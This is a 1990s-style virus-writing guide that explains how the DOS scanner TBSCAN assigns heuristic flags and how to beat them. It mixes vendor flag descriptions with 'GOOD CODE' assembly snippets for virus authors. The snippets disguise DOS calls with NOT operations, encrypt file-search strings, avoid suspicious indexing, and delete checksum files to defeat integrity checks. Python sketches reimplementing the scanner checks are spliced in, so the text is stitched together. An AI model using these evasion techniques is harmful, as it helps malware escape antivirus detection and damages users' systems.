Heuristics / Shmistics
by Köhntark
A guide to Anti-Heuristics / Shmistics Technology
INTRO

Dear Reader:

If you have been following the Virus / Anti-virus scene, you might have stumbled upon the word "Heuristics." Heuristics is a term commonly used in artificial intelligence programs (expert systems, etc.). So what does artificial intelligence have to do with software that is not even able to catch a Vienna.Grandma.Variant.#100 virus (CARO name?) created by a 15-year-old in his spare time? Well, it seems that the AV marketing strategists are running out of new technologies to sell to the ever hi-new-vapor-tech-hungry public and have decided to add artificial intelligence to the latest antiviral software bag of tricks.

But how intelligent are these "heuristics" programs really? Is it just another vain marketing trick, or is the sunrise of artificial intelligence upon us? Can we really have intelligent programs created by fools and demented megalomaniacs? I claim that heuristic AV programs are not intelligent at all, and I will prove it.

First, enter Thunderbyte Anti-Virus (TBAV), the Dutch shareware package that has become an underground favourite due to its liberal use of the word "heuristics" and its above-average quality. TBSCAN, TBAV's scanner, is an incredibly fast program that usually identifies a high percentage of new and unknown viruses. TBSCAN is the most reliable scanner for discovering the not-yet-named ditties created all around the world. Until now.

Enter Köhntark's "Heuristics / Shmistics guide." This informative program will show you how TBSCAN really works, how to ridicule this program, and how to beat it flag by flag (you can think of flags as heuristic warnings). Now you can be the first one on your block to write anti-heuristics / Shmistics viruses! The process is incredibly simple: for each flag or heuristic warning I have listed a BAD CODE (an example of evil, ugly code that causes heuristic flags to go off) and a GOOD CODE (an example of good, anti-heuristics code).
All you have to do when you have a virus that raises specific flags in TBSCAN is:
1- Look up the specific flag in the Heuristics / Shmistics guide.
2- Look at the BAD CODE (which corresponds more or less to your code).
3- Study the solution in the GOOD CODE part.
4- Adapt the solution to your particular code.
And voilà, viruses free of shmistics!

With this program I have included 2 BIG examples: a GOOD example, the first virus this side of the galaxy not to raise ANY heuristic flags when scanned by TBSCAN, and an EVIL example, a do-nothing file that, as you might have guessed, does not do anything, yet raises more heuristic flags than any virus known to mankind.

I hope this information is enough to spawn the next generation of anti-heuristic / shmistic viruses, to inspire virus programmers worldwide to write and modify the trillions of viruses used as currency by some people, and to force the AV marketing strategists to come up with better ideas next time. (Shall I mention that Thunderbyte will have to rewrite its scanner?)

Enjoy!
Köhntark
TBAV Terminology
1. Looking
2. Checking
3. Tracing
4. Scanning
5. Skipping
"Looking" means that TbScan has successfully located the entry
point of the program in one step. The program code has been
identified so TbScan knows where to search without the need of
additional analysis.
Looking will be used on most files produced by known software.
"Checking" means that TbScan has successfully located the entry
point of the program, and is scanning a frame of about 4 KB
around the entry point. If the file is infected the signature
of the virus will be in this area. "Checking" is a very fast
and reliable scan algorithm.
Checking will be used on most files that are not produced by
known software.
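To make "a frame around the entry point" concrete, here is a minimal Python sketch (not TbScan's code) that computes the entry-point file offset of a DOS program and a scan window around it. It assumes the standard MZ header layout (header size in paragraphs at offset 08h, initial IP and CS at 14h and 16h) and treats any file without an "MZ"/"ZM" signature as a COM image that starts at file offset 0. The helper names and the choice to centre a 4096-byte window on the entry point are illustrative assumptions; the text only says "about 4Kb around" it.

```python
import struct

FRAME_SIZE = 4096  # "about 4 KB"; the exact size TbScan uses is an assumption


def entry_offset(data: bytes) -> int:
    """File offset where execution starts, for a DOS COM or MZ EXE image."""
    if data[:2] in (b"MZ", b"ZM"):
        header_paragraphs, = struct.unpack_from("<H", data, 0x08)  # header size / 16
        ip, cs = struct.unpack_from("<HH", data, 0x14)            # initial CS:IP
        # CS is relative to the load image, which starts right after the header;
        # masking to 20 bits mimics real-mode wrap-around for "negative" CS values.
        return (header_paragraphs * 16 + cs * 16 + ip) & 0xFFFFF
    return 0  # a COM image is loaded at CS:0100h and starts at file offset 0


def scan_frame(data: bytes, frame: int = FRAME_SIZE) -> tuple[int, int]:
    """(start, end) of a window of up to `frame` bytes centred on the entry point."""
    entry = entry_offset(data)
    start = max(0, entry - frame // 2)
    end = min(len(data), start + frame)
    return start, end
```

For a COM file the window simply covers the first 4096 bytes. For an EXE file it follows CS:IP into the load image.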
"Tracing" means that TbScan has successfully traced a chain of
jumps or calls while locating the entry-point of the program,
and is scanning a frame of about 4 KB around this location. If
the file has been infected, the signature of the virus will be
in this area. "Tracing" is a fast and reliable scan algorithm.
Tracing will be primarily used for TSR-type COM files or Turbo
Pascal-compiled programs. Most viruses will force TbScan to use
"Tracing".
"Scanning" means that TbScan is scanning the entire file
(except for the exe-header which cannot contain any viral
code). This algorithm will be used if "Looking", "Checking" or
"Tracing" cannot be safely used. This is the case when the
entry-point of the program contains other jumps and calls to
code located outside the scanning frame, or when the heuristic
analyzer found something that should be investigated more
thoroughly. "Scanning" is a slow algorithm. Because it
processes almost the entire file, including data areas, false
alarms are more likely to occur.
The "Scanning" algorithm will be used while scanning
bootsectors, SYS and BIN files.
"Skipping" will occur with SYS and OVL files only. It simply
means that the file will not be scanned. As there are many SYS
files that contain no code at all (like CONFIG.SYS) it makes
absolutely no sense to scan these files for viruses.
The same applies to .OV? files. Many overlay files do not really
deserve the name, as they lack an exe-header. Such files cannot be
invoked through DOS, which makes them just as invulnerable to direct
virus attacks as .TXT files are. If a virus is reported to have
infected an .OV? file, it involved one of the relatively few overlay
files that do contain an exe-header. The infection was then the
result of the virus monitoring the DOS exec call (function 4Bh) and
infecting any program invoked that way, including "real" overlay files.
TBAV Flags
# - Decryptor code found
! - Invalid program.
1 - 80186+ instructions.
@ - Strange instructions
? - Inconsistent header.
c - No integrity check
h - Hidden or System file.
i - Internal overlay.
p - Packed or compressed file.
w - Windows or OS/2 header.
A - Suspicious Memory Allocation
B - Back to entry.
C - File has been changed
D - Direct disk access
E - Flexible Entry-point
F - Suspicious file access
G - Garbage instructions.
J - Suspicious jump construct.
K - Unusual stack.
L - Program load trap
M - Memory resident code.
N - Wrong name extension.
O - Code overwrite.
R - Suspicious relocator
S - Search for executables
T - Invalid timestamp.
U - Undocumented system call.
V - Validated program
Y - Invalid boot sector.
Z - EXE/COM determinator.
# - Decryptor code found.
The file possibly contains a self-decryption routine. Some
copy-protected software is encrypted so this warning may appear for
some of your files. But if this warning appears in combination
with, for example, the "T" (invalid time stamp) warning, there could
be a virus involved and TbScan assumes the file is contaminated!
Many viruses encrypt themselves and cause this warning to be displayed.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BAD_CODE:
TBSCAN will trace right thru the most complicated encryption routines..
for polymorphic viruses this flag will be set most of the times..
including MTE and most TPE..
The more complex the routines are the more chances your virus has
of setting other flags such as the G (Garbage code) flag.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
The trick here is to use dumb encryption routines, the kind the
virus-guide writers hate.. why? because they are common in
commercial and shareware software programs and they are non-suspicious
looking. The main drawback with "Heuristics" Scanning is the possible
number of false positives, and using commonly used encryption routines
makes things worse.
This is why self appointed AV "researchers" had a hard time coming
up with reliable detection methods for Trident's Polymorphic Engine,
since it generates a lot of commonly found decryptors/encryptors.
Also I must note that there is a couple of extremely esoteric
encryption routines that will not be recognized by TBSCAN as
encryptions at all!
! - Invalid program.
Invalid opcode (non-8088 instructions) or out-of-range branch. The
program either has an entry point located outside the body of the
file, or reveals a chain of jumps that can be traced to a location
outside the program file. Another possibility is that the program
contains invalid processor instructions. In most cases the program
being checked is damaged and cannot execute. At any rate, TbScan
avoids risk and uses the "Scanning" method on the file.
1 - 80186+ instructions.
The file contains instructions which cannot be executed by 8088
processors, and require an 80186 or better processor.
@ - Strange instructions
The file contains instructions which are not likely to be generated by an
assembler, but by some code generator like a polymorphic virus instead.
? - Inconsistent header.
The program being processed has an EXE-header that does not reflect the
actual program lay-out. Many viruses do not update the EXE-header of an
EXE file correctly after they infect the file, so if this warning pops up
frequently, you probably have a problem.
h - Hidden or System file.
The file has the Hidden or the System file attribute set. This means
that the file is not visible in a DOS directory display but TbScan scans
it anyway. If you don't know the origin and/or purpose of this file, you
might be dealing with a Trojan Horse or a joke virus program. Copy
such a file onto a diskette, remove it from its program environment, and
then check whether any program misses the file. If none does, you have
not only freed some disk space, but you might also have prevented a
future disaster.
i - Internal overlay.
The program being processed has additional data or code behind the
load-module as specified in the EXE-header of the file. The program might
have internal overlay(s) or configuration or debug information appended
behind the load-module of the EXE file.
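The "?" and "i" conditions both come down to comparing the size the EXE header claims with the real file size. Here is a minimal Python sketch, assuming the standard MZ fields at offsets 02h (bytes used on the last 512-byte page) and 04h (number of pages). Mapping "claims more than the file holds" to "?" and "file is longer than claimed" to "i" is a simplification for illustration and not TbScan's documented rule.

```python
import struct


def mz_image_size(data: bytes) -> int:
    """Bytes the MZ header claims for the load module (header included)."""
    last_page_bytes, pages = struct.unpack_from("<HH", data, 0x02)  # e_cblp, e_cp
    if last_page_bytes == 0:
        return pages * 512                 # last page is completely used
    return max(0, (pages - 1) * 512 + last_page_bytes)


def header_flag(data: bytes) -> str:
    """Simplified mapping of header/file-size mismatches onto '?' and 'i'."""
    claimed = mz_image_size(data)
    if claimed > len(data):
        return "?"  # header describes more bytes than the file contains
    if claimed < len(data):
        return "i"  # extra data or code sits behind the load module
    return ""
```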
p - Packed or compressed file.
This means that the program is packed or compressed. There are some
utilities that can compress program files, such as EXEPACK and PKLITE.
If the file became infected after compression, TbScan is able to detect
the virus. However, if the file became infected before compression, the
virus was also compressed in the process, and a virus scanner might no
longer be able to recognize the virus. Fortunately, this does not happen
very often, but you should still beware! A new program might look clean,
but can turn out to be the carrier of a compressed virus. Other files in
your system will become infected too, and it is these infections that
will be clearly visible to virus scanners.
w - Windows or OS/2 header.
The program can be or is intended to run in a Windows (or OS/2)
environment. TbScan offers a specialized scanning method for these files.
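A common way to spot such a file is the "new executable" header that follows the DOS stub. The sketch below is a Python illustration that assumes the conventional MZ layout: the word at 18h (relocation-table offset) is 40h or more in new-style executables, and the dword at 3Ch points to a two-letter signature. The signature-to-platform table reflects general knowledge of these formats. How TbScan itself recognizes them is not documented here, and the function name is hypothetical.

```python
import struct
from typing import Optional

# Two-byte signatures of the "new executable" header that follows the DOS stub
NEW_EXE_KINDS = {
    b"NE": "16-bit Windows or OS/2 1.x (NE)",
    b"LX": "32-bit OS/2 (LX)",
    b"LE": "linear executable, e.g. Windows VxD (LE)",
    b"PE": "32-bit Windows (PE)",
}


def new_exe_kind(data: bytes) -> Optional[str]:
    """Return the new-executable type of an MZ file, or None for a plain DOS program."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        return None
    reloc_offset, = struct.unpack_from("<H", data, 0x18)   # e_lfarlc
    new_header, = struct.unpack_from("<I", data, 0x3C)     # e_lfanew
    if reloc_offset < 0x40 or new_header + 2 > len(data):
        return None  # conventional marker absent, or pointer outside the file
    return NEW_EXE_KINDS.get(bytes(data[new_header:new_header + 2]))
```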
C - File has been changed
This warning appears only if you use TbSetup to generate the ANTI-VIR.DAT
files and means the file has been changed. Upgrading the software would
trigger this message. Otherwise, it is very likely that a virus infected
the file!
NOTE:
TbScan does not display this warning if only some internal
configuration area of the file changes. This warning means that code
at the program entry point, the entry-point itself, and/or the file
size has been changed.
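The condition above (size, entry point, or entry-point code changed) can be modelled with a small fingerprint. This is a hypothetical Python sketch. The actual ANTI-VIR.DAT record format is not described in this guide, so the `Fingerprint` fields, the 64-byte window, and the use of SHA-256 are stand-ins chosen for illustration. The caller is assumed to supply the entry-point offset.

```python
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Fingerprint:
    """Hypothetical per-file record; not the real ANTI-VIR.DAT layout."""
    size: int          # file size in bytes
    entry: int         # entry-point file offset
    entry_digest: str  # hash of the code at the entry point


WINDOW = 64  # bytes of entry-point code to fingerprint (illustrative choice)


def fingerprint(data: bytes, entry: int) -> Fingerprint:
    code = data[entry:entry + WINDOW]
    return Fingerprint(len(data), entry, hashlib.sha256(code).hexdigest())


def has_changed(stored: Fingerprint, data: bytes, entry: int) -> bool:
    """True if size, entry point or entry-point code differ from the stored record."""
    return fingerprint(data, entry) != stored
```

Changing bytes outside the fingerprinted window leaves the record intact. This mirrors the NOTE above about internal configuration areas.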
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
The only way to avoid this is to delete or modify the Anti-Vir.Dat
file in each directory where you are infecting files to.
The easiest method is to delete the file, to overwrite or truncate
it, so it cannot be undeleted by a "smart" user.
For perfect "stealth" one could modify the contents of the file,
putting the right flag in the file-to-be-infected field describing
it as a "self-modifying" file. This is more involved and requires
unnecessary code, since the deleting of checksum files can be
implemented as a universal attack against several integrity checking
programs, not just TBSCAN.
c - No integrity check.
This warning indicates that no checksum/recovery information has
been found about the indicated file. It is highly recommended to
use TbSetup in this case to store information of the mentioned
file. This info can later be used for integrity checking and to
recover from virus infections.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
This is not really a flag... it won't raise any warnings by itself..
This only means that the file ANTI-VIR.DAT wasn't found in the current
directory you are scanning.. this is good news of course, as TBSCAN
cannot verify any checksum information for the files...
F - Suspicious file access.
TbScan has found instruction sequences common to infection schemes
used by viruses. This flag will appear with those programs that
are able to create or modify existing files.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BAD_CODE:
;Restore date and time of file to be infected
mov ax,5701h
mov dx,WORD PTR [si + OFFSET F_DATE - OFFSET VIRUS]
mov cx,WORD PTR [si + OFFSET F_TIME - OFFSET VIRUS]
int 21h
;Restore file attributes
lea dx,[si + FNAME - OFFSET VIRUS] ;get filename
mov cx,[si + ATTR - OFFSET VIRUS] ;get old attributes
mov ax,4301h ;set file attributes to cx
int 21h
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
;Restore date and time of file to be infected
mov ax,0A8FEh
mov dx,WORD PTR [si + F_DATE - OFFSET VIRUS]
mov cx,WORD PTR [si + F_TIME - OFFSET VIRUS]
not ax ;A8FE becomes 5701
int 21h
;Restore file attributes
lea dx,[si + OFFSET FNAME - OFFSET VIRUS] ;get filename
mov cx,[si + OFFSET ATTR - OFFSET VIRUS] ;get old attributes
mov ax,0BCFEh
not ax ;BCFE becomes 4301h
int 21h
There is a million different ways of doing this, this is just an
example
R - Suspicious relocator.
Flag "R" refers to a suspicious relocator. A relocator is a
sequence of instructions that changes the proportion of CS:IP. It
is often used by viruses, especially COM type infectors. Tests on a
large collection of viruses show that TbScan issues this flag for
about 65% of all viruses. Those viruses have to relocate the CS:IP
proportion because they have been compiled for a specific location
in the executable file; a virus that infects another program can
hardly ever use its original location in the file as it is appended
to this file. Sound programs "know" their location in the
executable file, so they don't have to relocate themselves. On
systems that operate normally only a small percentage of the
programs should therefore cause this flag to be displayed.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BAD_CODE:
;*****************
; 1-OPEN FILE
;*****************
lea dx,[si + OFFSET FNAME - OFFSET VIRUS] ;open the file
mov ax,3D02h ;r/w access to it
int 21h
jc NO_GOOD ;error.. quit
xchg ax,bx ;bx = file handle
Where do you think the problem is?
Well, you might have read in clumsy virus writing guides of the joys
of using indexed instructions to access the virus' data locations in
memory to make your code fast and small. The "experts" use them even
in their soup and it makes their code tight.
Well, do you want tight code that can be recognized as a virus from
miles away or you want real, undetectable viruses?
If you chose the later do yourself a favour.. minimize the use of
indexes.
TBSCAN will set the R flag with just a few of them anywhere in your
code.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
mov bp,si ;flabby, fat code
add bp,OFFSET FNAME - OFFSET VIRUS ;but it unsuspicious!
mov dx,bp
mov ax,3D02h ;r/w access to it
int 21h
jc NO_GOOD ;error.. quit
xchg ax,bx ;bx = file handle
You can apply the same solution for any code that can be indexed:
mov WORD PTR [si + ATTR - VIRUS],cx ;save attributes
cmp BYTE PTR [si + START_CODE+3 - VIRUS],20h ;check for " "
add WORD PTR [si + LOC - VIRUS],cx
sub WORD PTR [si + LOC1 - VIRUS],dx
etc..
The strategy is the same.. it might add a lot of "fat" to your code,
but a fat virus is better than a dead one.
N - Wrong name extension.
Name conflict. The program carries the extension .EXE but appears
to be an ordinary .COM file, or it has the extension .COM but the
internal layout of an .EXE file. TbScan does not take any risk in
this situation, but scans the file for both EXE and COM type
signatures. A wrong name extension might in some cases indicate a
virus, but in most cases it doesn't.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BAD_CODE:
This will occur in extremely buggy viruses that cannot distinguish
EXE files from COMs or in stupid overwriting viruses.
There is also a couple of DOS 5.0 files, specifically DISK.COM that
have a EXE header, so special care must be taken in not raising extra
flags since any possible host may have heuristic flags of its own, so
any heuristic flags added by the virus will just make the file more
suspicious.
S - Search for executables.
The program searches for *.COM or *.EXE files. This by itself does
not indicate a virus, but it is an ingredient of most viruses
anyway (they have to search for suitable files to spread themselves).
If accompanied by other flags, TbScan will assume the file is infected
by a virus.
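A plain-text search is enough to reproduce this kind of match. This Python sketch finds "*.COM" and "*.EXE" masks in a file image, case-insensitively, and only sees masks stored as plain text. The names are illustrative, and TbScan's actual matching rules are not documented here.

```python
import re

# Wildcard masks that, per the text, are enough to raise the 'S' flag
EXEC_MASK = re.compile(rb"\*\.(?:COM|EXE)", re.IGNORECASE)


def find_exec_masks(data: bytes) -> list[tuple[int, bytes]]:
    """Return (offset, text) for every plain-text *.COM / *.EXE mask in `data`."""
    return [(m.start(), m.group(0)) for m in EXEC_MASK.finditer(data)]
```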
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BAD_CODE:
The following code (even by itself!) is enough to set this flag:
db '*.COM'
db '*.EXE'
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GOOD_CODE:
To get around this use what I call "point-encryption routine" to
make the strings into something not recognizable.. (Also, see the
Z flag)
mov bp,OFFSET COM_FILES ;decrypt *.COM string
call POINT_ENCRYPT
add bp,02
call POINT_ENCRYPT
lea dx,[si + OFFSET COM_FILES - OFFSET VIRUS ] ;dont use this..
;see R flag
mov ax,04E00h ;mov ah,4eh, => DOS search 1st file function
mov cx,3fh ;search for any file, with any attributes
int 21H
etc..
POINT_ENCRYPT:
push bp ;save bp to do dword encryptions
etc.
add bp,si
sub bp,OFFSET VIRUS ;the entry point of the virus is on si
xor WORD PTR [bp],ID2
pop bp ;restore bp
ret ;return to caller
COM_FILES
db 5Dh,59h,34h,38h,'M',0 ;encrypted *.COM,0
ID2 equ 7777h ;(used in POINT_ENCRYPT)
This is just one (and rather inefficient) way of doing this...
there are a million other ways... this is just to give you an idea.
For a more efficient way look in the example virus.
A - Suspicious Memory Allocation
The program uses a non-standard way to search for, and/or to allocate
memory. Many viruses try to hide themselves in memory, so they use a
non-standard way to allocate this memory. Some programs (such as
high-loaders or diagnostic software) also use non-standard ways to search
or allocate memory.
B - Back to entry.
The program seems to execute some code, and after that jumps back to the
entry-point of the program. Normally this results in an endless loop,
except when the program also modifies some of its instructions. This is
quite common behavior for computer viruses. In combination with any other
flag, TbScan reports a virus.
D - Direct disk access
This flag appears if the program being processed has instructions near
the entry-point to write to a disk directly. It is quite normal that some
disk related utilities trigger this flag. If several files that should
not be writing directly to the disk trigger this flag, your system might
be infected by an unknown virus.
NOTE:
A program that accesses the disk directly does not always have the
"D" flag. Only when the direct disk instructions are near the
program entry point does TbScan report it. If a virus is at fault,
the harmful instructions are always near the entry point, so it is
only there that TbScan looks for them.
E - Flexible Entry-point
This flag indicates that the program starts with a routine that
determines its location within the program file. This is rather
suspicious because sound programs have a fixed entry-point so they do not
have to determine this location. For viruses, however, this is quite
common. Approximately 50% of the known viruses trigger this flag.
G - Garbage instructions.
The program contains code that seems to have no purpose other than
encryption or avoiding recognition by virus scanners. In most cases there
won't be any other flag since the file is encrypted and the instructions
are hidden.
NOTE:
This flag appears occasionally on "normal" files. This simply
indicates, however, that these files are poorly designed, not infected.
J - Suspicious jump construct.
The program did not start at the program entry point. The code has either
jumped at least twice before reaching the final startup code, or the
program jumped using an indirect operand. Sound programs should not
display this kind of strange behavior. If several files trigger this
flag, you should investigate your system thoroughly.
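The "jumped at least twice" rule, and the out-of-file chain behind the "!" flag, can be illustrated by following direct JMP instructions from the start of a COM image. This is a hedged Python sketch. It only understands the near JMP (E9h, 16-bit displacement) and short JMP (EBh, 8-bit displacement) opcodes, ignores CALLs and the indirect jumps the text also mentions, and caps the chain at 16 hops. The cap, thresholds and names are assumptions.

```python
MAX_HOPS = 16  # illustrative cap; also stops endless "JMP $" loops


def trace_jumps(code: bytes, start: int = 0) -> list[int]:
    """Follow direct JMPs from `start` in a COM image; return the offsets visited.

    Relative jumps do not depend on the 100h load address, so file offsets work.
    """
    path = [start]
    pos = start
    for _ in range(MAX_HOPS):
        if not 0 <= pos < len(code):
            break                                      # chain left the file
        opcode = code[pos]
        if opcode == 0xE9 and pos + 3 <= len(code):    # JMP near, rel16
            rel = int.from_bytes(code[pos + 1:pos + 3], "little", signed=True)
            pos += 3 + rel
        elif opcode == 0xEB and pos + 2 <= len(code):  # JMP short, rel8
            rel = int.from_bytes(code[pos + 1:pos + 2], "little", signed=True)
            pos += 2 + rel
        else:
            break                                      # reached non-jump code
        path.append(pos)
    return path


def jump_flag(code: bytes) -> str:
    """'!' if the chain ends outside the file, 'J' for two or more jumps, else ''."""
    path = trace_jumps(code)
    if not 0 <= path[-1] < len(code):
        return "!"
    return "J" if len(path) - 1 >= 2 else ""
```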
K - Unusual stack.
The EXE file being processed has an odd (instead of even) stack offset or
a suspicious stack segment. Many viruses are buggy and set up an
illegal stack value.
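Checking the "odd stack offset" part takes only a few lines once the initial SS:SP is read from the EXE header (SS at 0Eh, SP at 10h). Here is a minimal Python sketch with hypothetical function names. The text does not define what counts as a "suspicious stack segment", so the sketch does not attempt that part.

```python
import struct


def initial_stack(data: bytes) -> tuple[int, int]:
    """Initial (SS, SP) from an MZ header: SS at 0Eh, SP at 10h."""
    ss, sp = struct.unpack_from("<HH", data, 0x0E)
    return ss, sp


def odd_stack(data: bytes) -> bool:
    """True when the initial stack pointer is odd (word pushes would be misaligned)."""
    _, sp = initial_stack(data)
    return (sp & 1) == 1
```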
L - Program load trap
The program might trap the execution of other software. If the file also
triggers the "M" flag (memory resident code), it is very likely that the
file is a resident program that determines when another program executes.
Many viruses trap the program load and use it to infect the program. Some
anti-virus utilities also trap the program load.
M - Memory resident code.
TbScan has found instruction sequences that could cause the program to
hook into important interrupts. Many TSR (Terminate and Stay Resident)
programs trigger this flag because hooking into interrupts is part of
their usual behavior. If several non-TSR programs trigger this warning
flag, however, you should be suspicious. It is likely that a virus that
remains resident in memory infected your files.
NOTE:
This warning does not appear with all true TSR programs, nor can you
always rely upon TSR detection in non-TSR programs.
O - Code overwrite.
This flag appears if TbScan detects that the program overwrites some of
its instructions. However, it does not seem to have a complete
(de)cryptor routine.
T - Invalid timestamp.
The timestamp of the program is invalid; that is, the number of seconds
in the time stamp is illegal, or the date is illegal or later than the
year 2000. This is suspicious because many viruses set the time stamp to
an illegal value (such as 62 seconds) to mark that they already infected
the file so they won't infect a file a second time. It is possible that
the program being checked is contaminated with a virus that is still
unknown, especially if several files on your system have an invalid time
stamp. If only very few programs have an invalid time stamp, you'd better
correct it and scan frequently to check that the time stamps of the files
remain valid.
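DOS packs a file's time and date into two 16-bit words, with seconds stored in 2-second units. That is why the 5-bit seconds field can encode up to 62 "seconds". Here is a minimal Python sketch of the check described above. It assumes the standard DOS layout (time: hours in bits 15-11, minutes 10-5, seconds/2 in 4-0; date: years since 1980 in bits 15-9, month 8-5, day 4-0) and treats "later than the year 2000" as a configurable cutoff.

```python
import datetime


def decode_dos_datetime(date: int, time: int) -> tuple[int, int, int, int, int, int]:
    """Unpack DOS date/time words into (year, month, day, hour, minute, second)."""
    year = 1980 + (date >> 9)
    month = (date >> 5) & 0x0F
    day = date & 0x1F
    hour = time >> 11
    minute = (time >> 5) & 0x3F
    second = (time & 0x1F) * 2  # stored in 2-second units, so 31 means "62 s"
    return year, month, day, hour, minute, second


def invalid_timestamp(date: int, time: int, last_year: int = 2000) -> bool:
    year, month, day, hour, minute, second = decode_dos_datetime(date, time)
    if hour > 23 or minute > 59 or second > 59:
        return True
    try:
        datetime.date(year, month, day)  # rejects month 0, day 0, 30 February, ...
    except ValueError:
        return True
    return year > last_year
```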
U - Undocumented system call.
The program uses unknown DOS calls or interrupts. These unknown calls can
be issued to invoke undocumented DOS features, or to communicate with an
unknown driver in memory. Since many viruses use undocumented DOS
features, or communicate with memory resident parts of a previously
loaded instance of the virus, a program is suspicious if it performs
unknown or undocumented communications. This does not necessarily
indicate a virus, however, since some tricky programs also use
undocumented features.
V - Validated program
The program has been validated to avoid false alarms. The design of this
program would normally cause a false alarm by the heuristic scan mode of
TbScan, or this program might change frequently, and TbScan excludes the
file from integrity checking. Either TbSetup (automatically) or TbScan
(manually) stores these exclusions in the ANTI-VIR.DAT file.
Y - Invalid boot sector.
The boot sector is not completely according to the IBM defined boot
sector format. It is possible that the boot sector contains a virus or
has been corrupted.
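A few structural checks give an idea of what "according to the IBM defined boot sector format" can mean. This Python sketch is a simplified assumption, not TbScan's actual test. It requires 512 bytes, the 55h AAh signature at offsets 510-511, an initial jump (EBh xx 90h or E9h), and a plausible bytes-per-sector value in the BIOS Parameter Block at offset 0Bh. The function name is hypothetical.

```python
def boot_sector_problems(sector: bytes) -> list[str]:
    """Simplified structural checks on a DOS boot sector; [] means nothing odd found."""
    if len(sector) != 512:
        return ["sector is not 512 bytes"]
    problems = []
    if sector[510:512] != b"\x55\xAA":
        problems.append("missing 55AAh signature at offset 510")
    short_jmp = sector[0] == 0xEB and sector[2] == 0x90  # EB xx 90
    near_jmp = sector[0] == 0xE9                         # E9 xx xx
    if not (short_jmp or near_jmp):
        problems.append("does not start with a jump instruction")
    bytes_per_sector = int.from_bytes(sector[0x0B:0x0D], "little")  # BPB field
    if bytes_per_sector not in (512, 1024, 2048, 4096):
        problems.append("implausible bytes-per-sector value in the BPB")
    return problems
```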
Z - EXE/COM determinator.
The program seems to check whether a file is a COM or EXE type program.
Infecting a COM file is a process quite different from infecting an EXE
file, which implies that viruses able to infect both program types should
also be able to distinguish between them. There are, of course, innocent
programs that need to find out whether a file is a COM or EXE file.
Executable file compressors, EXE2COM converters, debuggers, and
high-loaders are examples of programs that might contain a routine to
distinguish between EXE and COM files.